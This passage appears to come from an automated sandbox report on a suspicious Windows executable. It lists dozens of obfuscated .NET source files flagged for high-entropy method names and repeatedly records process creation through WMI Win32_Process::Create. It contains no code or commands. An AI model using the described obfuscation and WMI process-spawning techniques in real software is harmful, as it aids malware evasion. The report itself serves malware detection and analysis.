Source: jmBb9uY1B8.exe, vdFoDUoLDr92Tlge17d.cs	High entropy of concatenated method names: 'ND1PuI5UDS', 'YlbPtXvSuB', 'mYrLUXrvHDYDlPROauJ', 'i3OAuKrBbiCGiExq3Ml', 'H6kWlRrP3DtkkBXBPfp', 'FYkiIxrGvTd8dxepIk4', 'cT3PGMncyF', 'd2HvBNfYFtFlMF4kjau', 'pQFg1cf3m1Hj1S7d6iH', 'HIJ4Rbrpwym98DmFoXK'
Source: jmBb9uY1B8.exe, fmxBB5425GsebqRjkix.cs	High entropy of concatenated method names: 'rU3', 'YZ8', 'M54', 'G9C', 'nm4PuWWLwsd3SvHGFca', 'ODCPFhWM7Fr52kNlipJ', 'qhyBMmWseOLFQKFRieC', 'nnirnPWqdI21RB484o3', 'j2q9bgWD6Z3ki4wEMqc', 'lgRWoRWOu5SFm4HXb0X'
Source: jmBb9uY1B8.exe, pYyEBVgwbZMn4e4hWI.cs	High entropy of concatenated method names: '_88Z', 'YZ8', 'ffV', 'G9C', 'wvU8YxlOlrPd213IgTw', 'CkDtRclRbeR9JvaXGOa', 'pTKQBmlEJJPF2wQcx3S', 'luVY6KlculcDRAc12GD', 'lQFw2TlXyk3ipkEqDSw', 'WZbMBklQeX8LRrYo25o'
Source: jmBb9uY1B8.exe, DGumaw4X6YTcLMG0ixW.cs	High entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'XPeWZRIEe7ZNhqGIbDM', 'TbqL0qIcxrs7oUdcNAh', 'm8wJCfIXuOlyIyBjQpf', 'v8d2gkIQm9wexYDQYCj', 'uMDfuOIiV5Ifjh1Nohd', 'LlI3uqIPd4jvNY6Zl0b'
Source: jmBb9uY1B8.exe, uZXaWBPKpOE7CM9yy0P.cs	High entropy of concatenated method names: 'D4M', '_4DP', 'HU2', '_4Ke', '_5C9', '_7b1', 'lV5', 'H7p', 'V5L', '_736'
Source: jmBb9uY1B8.exe, XG5B6fmgXNjrGqJuSYd.cs	High entropy of concatenated method names: 'q591XZHEs6', 'P1B1KU3l7a', 'rVT1RdnL7u', 'q1s12TpDlQ', 'S2R11Ucl7u', 'Shb1qrYkpg', 'H7g1GNKMHy', 'Ldy1nK0vGS', 'IQd1828T2w', 'TVD1VAYdPX'
Source: jmBb9uY1B8.exe, RnFBYBUSwm8WAgChYON.cs	High entropy of concatenated method names: '_223', 'YfVdH5erbj58XkqQ7yj', 'AgFKeTef7RtlSELvBT7', 'pT3pDCeyhdVoERvk3MD', 'hZufsGemPw8UCNX6aOC', 'iWmrbqeeTMMobxabM84', 'seEQLteCA9KSZSOjjiT', 'dM6JXue1hkqUZ8oETyt', 'PVgLMUekMZ5ocUHDsoA', 'FOjDVPeolA9QbmJDIZk'
Source: jmBb9uY1B8.exe, S0fhZPN6XCA4U47yg6L.cs	High entropy of concatenated method names: 'e4YZ3yhvSW', 'VSkZFqHGij', 'o3oZQ22uNm', 'CMgcrf2MBvBJGNYiZY5', 'zsrpbe2Zfj6DLdEoHva', 'Kupxta2LIQ6ehdiaPWA', 'HAIC632sVgbhhVTXS6x', 'XuRy5n2qLUlaHB7TMxd', 'zfdPCl2DB5mwiGO5f79', 'cSKLpG2OFeTiOtjTWYs'
Source: jmBb9uY1B8.exe, exwRjbUVT4BtwK6d47u.cs	High entropy of concatenated method names: 'Daut1VqPvS', 'MvMtqVWCWc', 'hYjtGPKUcE', 'doDoXZCDLKM1LnWUVIa', 'uKErAXCsJ21M6vMutMW', 'Q9i3QVCqUE5bWDuQFNC', 'vp6ejmCOa1U2iwnIgYM', 'tDktPMtMis', 'ajptaU5bss', 'sYUtu9MUlk'
Source: jmBb9uY1B8.exe, KWhPiAdEyqva9QgvjV.cs	High entropy of concatenated method names: 'FOXe30rKA', 'xgOxJKAlW', 'GtOD9regJ', 'wvJ4LH3ZDbZCqvdqkJV', 'KYbKlf3ub14qwFkR7t6', 'jyXYRL320svCmj5W6Yo', 'ILMKss3LSRJxkysFMI5', 'ptyMeB3MVgPT2mfW68c', 'B8hWi93sseoRMlpre3F', 'hrtQSv3qpRuASHbGh1c'
Source: jmBb9uY1B8.exe, vdEXshU2u7c497d2PZm.cs	High entropy of concatenated method names: 'vAQusxI1GT', 'MAiuH1LttV', 'waZu0IQsZO', 'zt2uiXBLDg', 'FfTy0neF7oYSw263Urr', 'vqGWcceNMu0LeJUnnwR', 'b5EYtYeu5dtKt265PHU', 'VWexxAeA0Kwpe1TU7Aw', 'DWkNI5etTcSIFqKB8eb', 'FAv8Fme2y484VHFPD1W'
Source: jmBb9uY1B8.exe, zt2XBLmtDgj66tAjL7n.cs	High entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
Source: jmBb9uY1B8.exe, UesE9O4BfjF0fwmSwXk.cs	High entropy of concatenated method names: 'wMn4M4e4hW', 'Yy46nUj2J4bthEc9A11', 'WA1jRYjZW1I4TUVMHb9', 'CYtpc8jNDXA795heBAa', 'xd9LQejuvZ1vlwdP6Yf', 'chwfdRjLoMDTmqxrZgw', '_3Xh', 'YZ8', '_123', 'G9C'
Source: jmBb9uY1B8.exe, x4klEO4AtgJkJArgolT.cs	High entropy of concatenated method names: 'eJhocEAUoO', 'ucuow2JXPN', 'v95oZ2errA', 'ttXud8haC3nt6PJu51c', 'nSYG7ghwHZuWtBa5rrq', 'xSdq4jhj5XvdPrOBWab', 'p5lAuShhd2sobVpQx37', 'hrHgtqhUXE8rUTjSH8n', 'fZfg3fhbT1lgNREZOd0', 'fSP1jsh7aLOXGcMZHKv'
Source: jmBb9uY1B8.exe, eoMtdqNOBKx6ktHvjBK.cs	High entropy of concatenated method names: 'DpMXmAo2AF', 's8lXN9BhbN', 'g3nXP57ZDC', 'nnxXak3wkH', 'yudXuvQPRF', 'TW1XtkLWmt', 'x40XTqKBMl', 'jn5XYGUe2q', 'RLQXkOYX3O', 'D9IXS3rj5X'
Source: jmBb9uY1B8.exe, okGX3n2x3VMLqnjrdn.cs	High entropy of concatenated method names: 'o5A', '_612', 'C8E', 'k71', 'k3c', '_591', 'vnj8TJsZKV0tJ0ArSU', 'GwNhoWqdQxrJDsyEau', 'n1R9YCLXYeuBmkgFCs', 'CHif4GMMpYNMgbVaNN'
Source: jmBb9uY1B8.exe, AJDBe6IGRF7X9iXILt.cs	High entropy of concatenated method names: 'g25', 'YZ8', '_23T', 'G9C', 'RNvs4iBPo', 'C7LOysKNwewjpnhOerb', 'j9YQ5kKuaUBYDwrCsve', 'prXrZMK2NffMtrHIkRt', 'pywVJWKZMSmGYkyo9Su', 'r91sBaKL5kKvEBpZ6wT'
Source: jmBb9uY1B8.exe, e74mK5aYQv4Rhi16O0K.cs	High entropy of concatenated method names: 'hCAjaBUU4CM5O', 'N2DYmWR6wQbc0RDFoq9', 'G4hvw2RJf7cBIrbEo4F', 'ODjFCVRS3qImcNuxuoF', 'S8nX3ARrsE54iNJsuGA', 'F6aZiJRfoC0gkLY4N8s', 'nIalbgRb11vDHAqlfLW', 'Taswx9R7QoqiXnUZtn3', 'NbRaLMRy88mI8x4Xh2F', 'FAMqFQRmB60Quio41AM'
Source: jmBb9uY1B8.exe, dLkpWdmYSQ2galTfjIL.cs	High entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
Source: jmBb9uY1B8.exe, I46MGNUTVMeRZxM4sdG.cs	High entropy of concatenated method names: 'J3XuIhpkGi', 'VaNueLLQ7y', 'fTjux2L7iM', 'mIbfqAe72BSvy4JrZSj', 'haxWpxeUSWAXUNTsAe8', 'FgI1kQebwwvRdETNbRO', 'I6S4pCe6w2peOQ6hKx9', 'FIdu1JOSTt', 'Y9euqJ5AwO', 'XtJuGiOAbu'
Source: jmBb9uY1B8.exe, qH7CrLMOYFGFVBOvRs.cs	High entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'q3jl4ylG4yU1GbA5dZu', 'JdPNKElv5Q98CQcUDng', 'fgaSS9lBZwc4wKhgOjM', 'iM1R17lTCdAPDc9pjn6', 'bYr5xLl9AmI3NohF1Js', 'tEfpLxlp7jopStU4rK7'
Source: jmBb9uY1B8.exe, zsBEk5PDN9T36qhAf9a.cs	High entropy of concatenated method names: 'bnnvBNA3LN', 'btyRUFD8bYuG9nko75Z', 'UdE9sqDnQOvDvo8HuZn', 'cEsPiyDVrkXCmLxOe6J', 'whqx8OD4dV67vMs8T3g', '_1fi', 'JXr7E8070k', '_676', 'IG9', 'mdP'
Source: jmBb9uY1B8.exe, a5LQffooVZqaDauXwtr.cs	High entropy of concatenated method names: 'HjLo3plDBw', 'AXaoFC1ug7', 'tc0oQDquD8', 'sKPoEJXTGe', 'A52o5gchQ3', 'KL5oC4dn6B', 'VkZ0DlUrZAobhHprmyO', 'mkhh5MUfwpKoa6XDxi8', 'H6r4WrUJrmNjnqNBFLh', 'lTBpL5US7HUlmWNlJty'
Source: jmBb9uY1B8.exe, EBHHjHobyvq2soE5YQR.cs	High entropy of concatenated method names: 'HAkoXaisTC', 'mAxodkoLMv', 'pkCoK3PnSs', 'f4gODvhtyyy7YTX1GIA', 'sqVACJhF0bdsoeOSl4J', 'j0AiykhNtDQsFMgqSPO', 'iNHflMhuwYQQyYxrc5K', 'fWiKrWh2eCs4unVvoe0', 'qD0aNqhZOMNMBapxhfM', 'z0RTsmhnQxRJ7FWMpHE'
Source: jmBb9uY1B8.exe, wtJycA4wPtpMnjpiC8s.cs	High entropy of concatenated method names: 'kNf', 'YZ8', 'U31', 'G9C', 'whmAAMINyimK3iHVG7j', 'GhsMFrIu0BGTE5VL9KS', 'f19Cp1I2iqLXGudsxVW', 'BKeGW3IZFqo0oV7690f', 'VoKeV8IL0d8sGrDCXyC', 'sDysNGIMZVsWdalsJAV'
Source: jmBb9uY1B8.exe, WWbU98PQwdJ4UgJetu7.cs	High entropy of concatenated method names: 'Vsepc2USsp', '_1kO', '_9v4', '_294', 'prlpwG2nWO', 'euj', 'AmYpZ1a4Sx', 'e3JpX9JYcV', 'o87', 'g7SpdqrHP4'
Source: jmBb9uY1B8.exe, j3OPr2UmIrMPfq9vd9n.cs	High entropy of concatenated method names: 'D2ralxGVRv', 'PcWaslYE8J', 'Rv9aH5gMEn', 'VKva0L1R4E', 'wZQaiwoty4', 'd6Sa3SVssl', 'NKj3wxy4BytOrQoXxDB', 'DFpguDy5HZGuTTxdBok', 'kJ3gdOyV0uq3mgJ8jkq', 'DcnwZmy8T6OTBY7GC8T'
Source: jmBb9uY1B8.exe, rq2IUGEyovqRRrrXuV.cs	High entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'dyB7DBl6Le70oChW3Jv', 'Lv5PgolJlA7Eli4lXaT', 'dIYhqblSXa58DKVkTm0', 'KmaeyalrvpJmDrHMT6E', 'ulJJXUlfONuDaS9TZfU', 'ByxqKClynUBcFb6w4r6'
Source: jmBb9uY1B8.exe, HfWaKmaRxUDg34apENZ.cs	High entropy of concatenated method names: 'zWb0MRR01KHPXHDqrBX', 'Fdcr6mR5XxxRUNKoNsS', 'bSTQWrRo8NyTyvwBk0d', 'HMl3qvRxcH8xLMmOrD2', 'iJPr21WLBc', 'KQ7pMpR8luTTiZwf4k1', 'm7okxIRnluOHbTeObrT', 'FpEIXZRAd773sG6Aoew', 'h7nmFjRtCDPLyQluZKn', 'LIOtJwRFgyZ3jjeBGjF'
Source: jmBb9uY1B8.exe, h3uLctUEVHpMjEvyguq.cs	High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'Dd8TY2TQNF', 'nqAHQUbSoF', 'UDxTkmQqGJ', 'DnoHetXkMn', 'PW1lpNkZUOv42KhcOH1', 'jYrBMxkL1O2wZQh2lVi', 'iTg7kXkuiLfPjtEtype'
Source: jmBb9uY1B8.exe, ohEPbW4vh0TBvCJA4DT.cs	High entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'giuJsCwuFKE6xTrRhBH', 'oRUZd0w2cyGKgikgsNH', 'qexiejwZNdaLrhY72tW', 'p0uafGwLNys8MxCCY16', 'NJNhE4wMrhsT2Y6qINC', 'pINXOrwsSTjFKyZ5c4C'
Source: jmBb9uY1B8.exe, fC1ug74VJc0DquD8VKP.cs	High entropy of concatenated method names: 'xfV4persra', 'QhUxVcIradyhRLH9kQl', 'U2UDnWIfPcY9hi3qgyR', 'zhGKP2IJZFcAVfMWStV', 'BbUFIDISFKwQ4ELfGU7', 'kKoFS4IymmajsuRLNZn', 'TxeSn6Im3J75CAF7Y6W', 'bC15MhIeQoeBFRuMAg7', 'AncaKTICcOPobbX4bO9', 'f28'
Source: jmBb9uY1B8.exe, gcDrHc449vqiI8NvjAh.cs	High entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'mdW424gyGuCbsrTZDOH', 'oV6luPgm4fuNHWvJthw', 'FgsY2YgeXcIoo6p7IFJ', 'Q6sWA5gCO8vAwls6K1r', 'H4siCWg1K0NE69k46vT', 'br686sgkZGNZa2oMqdC'
Source: jmBb9uY1B8.exe, YLy7k4aXIQtPcybJuHd.cs	High entropy of concatenated method names: 'dw5rZrydOT', 'yKorXqqrjq', 'C1brdkZkkN', 'zmhrK1gq26', 'wSar7Nk1GV', 'G8mrvhW8VW', 'RlIrpWwBGq', 'UWPr6WhnoZ', 'frQrrMboGm', 'EUPrfJa0QA'
Source: jmBb9uY1B8.exe, Ry3OXflVersrapQfy5.cs	High entropy of concatenated method names: '_66K', 'YZ8', 'O46', 'G9C', 'q034OcHau8MhVcmAUiQ', 'FXdIQkHh3oChltde6ah', 'u1Ima5HUHBjNP7TwqJs', 'PbcnPHHbiRUgfWwPTAK', 'MkY7DnH7VZAoqanAgGC', 'kmqXx6H6eOYdls6PCrA'
Source: jmBb9uY1B8.exe, NFneDMoebXMJMVV08gy.cs	High entropy of concatenated method names: 'kHFNpneDMb', 'vFluDrS9OGDVcJ2wjHO', 'N7t9wNSpN6XloiEWGaA', 'NM4Y42SBGk4y38qDGTo', 'cN6grWSTRKScUrllGKo', 'nS1irWSzuD9RW6t1tIE', 'mD5VY2rYa3HcBvcha4O', 'pEqIGYr3KXVrsYlLUJH', 'rQghJdrKmFxMxlSSKfN', 'wKFSYerdUAqRNnMfkGV'
Source: jmBb9uY1B8.exe, aE66BMmZQ4YY2pJyAHO.cs	High entropy of concatenated method names: '_45b', 'ne2', '_115', '_3vY', 'ci4RbJ0IdY', '_3il', 'YCsR4wATCY', 'biRRo0XAQy', '_78N', 'z3K'
Source: jmBb9uY1B8.exe, eqQ0BrP9Xi4DY2lVHSL.cs	High entropy of concatenated method names: 'a4pdjDYm6O', 'zQIdJuXoOp', 'vaFd9FOVFp', 'XVDdcqwl2t', 'k79dwKNVSg', 'SL7T96MTrSfCqwMdNui', 'kTRbGXM99SWSmijj1Iq', 'gykduWMpD78btfHapog', 'PSh4xLMz9jbtV1xafVg', 'w4j8BSsYGxZjaEG8Brf'
Source: jmBb9uY1B8.exe, Ckid39NyhJ30trKlUJx.cs	High entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'ieoXwcjPca', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
Source: jmBb9uY1B8.exe, hlZ5BemMOLkxrORfvZp.cs	High entropy of concatenated method names: 'ICU', 'j9U', 'IBK', '_6qM', 'Amn', 'Mc2', 'og6', 'z6i', '_5G6', 'r11'
Source: jmBb9uY1B8.exe, SVkP6GULaL3AnbpWMju.cs	High entropy of concatenated method names: 'LHsakRe4wG', 'CZ3azDGolJ', 'Dd8epY1DFtMPHjg4gUA', 'yUV23M1OWjwZc838uhM', 'MEkyLG1sWNo9RKVa5TH', 'ym24201qCcQmIj6L0tr'
Source: jmBb9uY1B8.exe, pESQ6imNfovvKKYsfPl.cs	High entropy of concatenated method names: 'BclkG77sIx', 'GXOr7hxfiH4BHMYrXrt', 'kHbnyfxyaZngAKlO81a', 'bKq5YWxSaEbYHHn8QXD', 'BYS483xrMf9YNIgu0ok', 'ynbT64eUai', 'FO9Trg7f9K', 'CwnTf6rfiv', 'Iy0TItnUrx', 'vapTexHK2J'
Source: jmBb9uY1B8.exe, pdCIrc49kIduIArKmER.cs	High entropy of concatenated method names: 'gHL', 'YZ8', 'vF9', 'G9C', 'RC0QsPIoSl4ZfEZasfr', 'twPmFrIxgT8Vx9P5KF9', 'xj3puXI0ruI4Jw5EqwF', 'S6d0uqI5qTphV84RNJf', 'W2w0AnIVaTG0pQ7VsbZ', 'qi4A6NI4KGBIE4IfdjM'
Source: jmBb9uY1B8.exe, LFy2KLNUYQf8vNqEQfC.cs	High entropy of concatenated method names: 'UwaWfLt1vRAcCml49fM', 'n0V0actkWYThfTOsbu7', 'dVxPI4te3oXRFouYNWh', 'hYCynntCQTNYZ3bQO5K', 'fcrjZbLrh0', 'NX02Hyt0uHMKkEHWbJU', 'ye2pWEt5tR8V6RoaBja', 'edvBagto4ZOQ8VDqrnm', 'b9EyU3txFOtNmwFeo2h', 'xa9qVrtVKiWYbeIViWU'
Source: jmBb9uY1B8.exe, UpkC8YoBFalZOwiuxNX.cs	High entropy of concatenated method names: '_0023Nn', 'Dispose', 'YboNefb9MD', 'JJ6NxtOpkC', 'rYFNDalZOw', 'PuxNBNXKrg', 'QEPNhEnSQ9', 'NK3CEsrwkWdkqyE441K', 'OXJQVDrjkjcnDNP5OYJ', 'e00Gf1rW5nH50RAitFt'
Source: jmBb9uY1B8.exe, x62sRY4S3XeTnnccCwj.cs	High entropy of concatenated method names: 'd43', 'YZ8', 'g67', 'G9C', 'oZrevgW5UV69U80QkQl', 'cvNKmDWVPAAXCitDb9b', 'O87ySnW45HyTBrwdCyI', 'zAu7j6W8tvE6IIemltI', 'vMb310Wnd3i8ueALVML', 'AGoqARWA9Cd91NvsLRp'
Source: jmBb9uY1B8.exe, YJgM4n46uyXV8GBwnGD.cs	High entropy of concatenated method names: 'lYl40NtQKW', 'OURdvhjKVtA64KPuTWb', 'zYnUqBjd2aPwN11nJ4t', 'GLt6QijYIlSoqiIPnmD', 'jIF0QWj3WkSOLQydDBP', 'M3PSvqjHnZttVKSmBd9', 'V94QS7jldvZFddXlxgS', 'otjlXKjg3xU21wlQZ0w', 'dGy43ovqRR', 'PIHMEyjwPp0sVYph3di'
Source: jmBb9uY1B8.exe, U2FKBKUCdeIIdJOSTtA.cs	High entropy of concatenated method names: '_269', '_5E7', 'xORHYNqS0W', 'Mz8', 'FuUH3VvZOH', 'S1hU3vki5eE2OBDwhik', 'RLBgsrkPiNeoSXPVRr1', 't2nu6bkGCNAKEVZ2yTE', 'DOaECDkvHU8x6psOePT', 'LlIgaBkBai4LXxCjCig'
Source: jmBb9uY1B8.exe, qkDuw4NtD1ARnqnxAvv.cs	High entropy of concatenated method names: 'oDCZjx66WK', 'nlPZJL7VGb', 'CN7U8guGXGTbkVOm9qD', 'JjeO29uv2xlF4Z0ufHe', 'u6Uou0uB2NqgAnVHT9Y', 'NITGWLuTwrOcZGZYaTt', 'FES01ku9hdePHF2nLNr', 'VAsurPupNRlS2skBRQ6', 'o4jU5KuzM1qsOZxBeNg', 'kI1Peg2YUIPPmL8xhnt'
Source: jmBb9uY1B8.exe, J5TaikFUvdc3h2rgbm.cs	High entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'zXIKenlg1Hs5eck3ZDN', 'cchqtIlWTOm1N6DLKcr', 'tHssiSlIyipijjv10XF', 'QOym8Jlw6GSqn6LMj37', 'GYjUtAljMW6xiANmQym', 'JigAqYlaZeYFXEwN0jQ'
Source: jmBb9uY1B8.exe, fEPm1SmSNxktue9r7Og.cs	High entropy of concatenated method names: 'kPYkxuUjug', 'rR9kDV3WkF', 'Pv4kBQUptB', 'pdOkhEMFnC', 'LG8kLSocMr', 'y4SQmbxpdR3UoOROeqm', 'MFGiBSxzBytA5D6QbF0', 'ABktqDxTYapCfDbTjun', 'LwgrW6x9qljeKXHIeM0', 'gnbxsg0YT1JIiWrjrMw'
Source: jmBb9uY1B8.exe, cO9cu24tJXPNc952err.cs	High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'Fq7fXkWW66mwDZ9LAtK', 'jblpk3WIVbjHBG20tV6', 'bwnLEPWwyvh8PDArLoV', 'mTqdEQWjSMJBnl07vld', 'nC3PBRWaCmVds2nqmKP', 'TigqIxWhgUrYSSjf1qU'
Source: jmBb9uY1B8.exe, tM1JvoNeCLyZUnZnrpX.cs	High entropy of concatenated method names: 'A4ZXbABxJ2', 'WnDiKi2TvieNp77o58T', 'XY0l1m2vgmkNNij1A8e', 'mH5H4V2BVM5yssrPl3f', 'Y7K1ZG29tN8ukZFpuuq', 'Liq2Q32pagrFbMHKxWf', 'yLwfCg2zLaRm0lj0Mtw'
Source: jmBb9uY1B8.exe, yrr0hjUFQ5khY5hsF08.cs	High entropy of concatenated method names: '_9YY', '_57I', 'w51', 'yPxHxayExf', '_168', 'pLJrSDkx3fAHXpBcKnf', 'JneRTFk0iRktsRkxrP9', 'aJe5Bak5CULy3BraDNU', 'M86FyqkVLp4tqs4ZL85', 'rDN6qOk49Tx6PCF64qK'
Source: jmBb9uY1B8.exe, pSbakgUgs5LCym78c3g.cs	High entropy of concatenated method names: 'jk2Be3o240HmKdH75xR', 'd9kIrEoZr0MkZtUbi8B', 'NeC9xRoN4PB67L25sdh', 'aLa0o9oubv9LFfYwC9C', 'IWF', 'j72', 'sLNTGkmDKx', 'xytTnZYPQq', 'j4z', 'kioT8MxyFD'
Source: jmBb9uY1B8.exe, iEh76m4Ke0RJTDNe4Iq.cs	High entropy of concatenated method names: 'Ai7', 'YZ8', '_56U', 'G9C', 'GM488wIpJDuFZSXeGDZ', 'fFm2v0IzC6VRDwhw5CL', 'i24dSTwYXROu9yFhSdO', 'bZiFhRw3jJOfKUgDSij', 'jPrrkNwKLqhmXat5Tnc', 'zXMPCNwdcXcHIFcYcBk'
Source: jmBb9uY1B8.exe, UEpdel4Cpr3i361ucPh.cs	High entropy of concatenated method names: '_589', 'YZ8', '_491', 'G9C', 'fN14xqaXN7UuNSlHpBI', 'DtdQugaQ8AUsXXU8gDl', 'JrWuhNaiwgcrp9HGEET', 'aJAc8vaPbGWbTQatF8A', 'No67SJaGn0oKR6Hm7d8', 'ipuPPOavfYpQ59fGjre'
Source: jmBb9uY1B8.exe, CtidFkotLak7rEyUFvA.cs	High entropy of concatenated method names: 'x3oUffT0nr', 'vC1UIF7hKG', 'OrFUekZP0Y', 'o57UxM4avl', 'p69UDFbVpC', 'H1OUBh1C6B', 'yDuUh1etLx', 'D1oXxrbodBwX6ZRRHIj', 'oSId8Pb1GT8vHvmLlxJ', 'YndHtfbkCW0b6v1WnXr'
Source: jmBb9uY1B8.exe, OVsk7GU9TkauSl7SOXp.cs	High entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'zNIfAl1bx6L2Z5xWhuA', 'sAo2O317Uxu9dNWLne9', 'd4gKAw168Nu65A6yFCd', 'tbvgWJ1JfjSQJBwl89g'
Source: jmBb9uY1B8.exe, SuuZ1Qo2B6FpLGhAKro.cs	High entropy of concatenated method names: 'nrbUgGh2Xx', 'sGONRQ7dbXQmhUjfOJ1', 'hlVgJS7HPxDFj6N05VM', 'JJTJlW73u7A4ecQda32', 'CAyjem7Kf6pNEx325k4', 'EH1ujl7lih6H0qJFo6A', 'HVvJip7g6iJc42m6TPT', 'tbUUB97W6VHyNN17B1Y', 'z9qfdl7IwWYwo1q7FPu', 'Mlvbdv7woiQduHeAJZq'
Source: jmBb9uY1B8.exe, BSsvMVmJWCWcuYjPKUc.cs	High entropy of concatenated method names: 'qanSIdbVuS', 'j5NSeS9q7j', 'AF2SxwAlkP', 'HjxSDypB8o', 'SwMSBiOfnO', 'LjCmEa0NkHvDW321MHp', 'vkBTIu0u6qx9re4Gvu5', 'TuUdLx0tLnZMkofci4K', 'lY370J0FHADHs0CgnT9', 'vWWfmU02P0iSrDfWXOV'
Source: jmBb9uY1B8.exe, ci4J0IPIdYACswATCY4.cs	High entropy of concatenated method names: 'xlB86JDHtprY6hmYJ9C', 'VTCqJnDl6pSix9gsBy1', 'injfFTDKS9TDMnoaNOg', 'rflofWDdSdYgeJqrw24', 'QCBKeGh9Ao', 'WM4', '_499', 'yK8Kx7RxUi', 'WigKDjNTiQ', 'C4kKBT9h8E'
Source: jmBb9uY1B8.exe, iSKGCVNfqZEuFvbNuC4.cs	High entropy of concatenated method names: 'oHHZ5LHS8O', 'dmVZCcLbO6', 'NgWZOu5COc', 'rvoZg5oksD', 'cCAZyGM2AL', 'wehZMyk3Gm', 'HKDxD32cK9kRja8cCjS', 'E4Pan82RfV1cmnCTi1q', 'wZsAJR2E6PbIs8PytNO', 'RD4L8f2XF2dBkH9R9mD'
Source: jmBb9uY1B8.exe, aGh2Xx4EyGlkGeiGfDP.cs	High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'VfR63haATC15RySERaT', 'WkNNMVat5GqLXD5Wjgf', 'bBU5CMaFOvlH2tGjQLr', 'jYpiPQaNuCHLDoAW64P', 'TkuZ2SauATXGs6hLgsI', 'EQPXpFa2rP9rcu34r3k'
Source: jmBb9uY1B8.exe, BqvH594ee3PZoBF0jw5.cs	High entropy of concatenated method names: 'Kp54CoNE7n', 'bJAhJHjopD9i2niSCdS', 'cdDn9vjxAcPtVSk61mH', 'RO78opj13hA1FmhGles', 'WvaOqMjkVB92GXcwf2h', 'JcBIuBj0C82uIWqV6Rj', 'QLw', 'YZ8', 'cC5', 'G9C'
Source: jmBb9uY1B8.exe, bDg06OiGwD65Hp9UmU.cs	High entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'SsprOqHD1QAk8MY7Dhm', 'hRL3FVHObKDmhuLqw1c', 'y6gTylHRXeTW84VqSpu', 'KIvdOAHE0CEr0cOOs0D', 'XrWLc8HcR1tsE3Rdrps', 'uQk3bRHXnsLha9mZ8CU'
Source: jmBb9uY1B8.exe, B4QUptNABGdOEMFnCWG.cs	High entropy of concatenated method names: 'IFvX7NZnot', 'YWVXv2Qiah', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'P5dXpLOMeb', '_5f9', 'A6Y'
Source: jmBb9uY1B8.exe, nXaN0XPvvvEL2DgYaoi.cs	High entropy of concatenated method names: 'AlSKtce3oq', 'zrCKTBCJTW', 'dWoKYcQbEZ', '_3Gf', '_4XH', '_3mv', '_684', '_555', 'Z9E', 'XEZKkEsNxe'
Source: jmBb9uY1B8.exe, hfKDvs4ntgESAZm6WEV.cs	High entropy of concatenated method names: 'yiQ', 'YZ8', '_5li', 'G9C', 'wNrBiRIYKnwkTVJRIBV', 'Fyss93I3IEk3J2ZoLSs', 'BjsCe3IKbxTERHD07RF', 'd7MLqRIdpWlnFoItuKw', 'GUsZWbIHLKBXyK0hCNZ', 'KpOQ0nIltbWwuZlQ3V0'
Source: jmBb9uY1B8.exe, pkC3Pn4YSsAeF893Lmm.cs	High entropy of concatenated method names: '_6U6', 'YZ8', '_694', 'G9C', 'x3vXCxWywpIEum0ZGte', 'tQXcJyWmhdnUCQLpbZO', 'gJcWTWWeKuBeCbPTcN6', 'E4ivwKWCSTnZyXKq1rG', 'ekkIIJW1sxfiD1sgNx9', 'tLGkwjWkiBT570KvL5C'
Source: jmBb9uY1B8.exe, KV2eZxHDMsNefvm28Q.cs	High entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'dexVp7HroucCgg2j0po', 'VphFViHfaB2Hl5VGchT', 'kalnTQHyeOgs6uXXAJy', 'RinrCqHm0gdjEc7htUi', 'Mii2VkHeflMJZYCf1bd', 'jXya1mHCLpyqJR6jvCn'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\jmBb9uY1B8.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
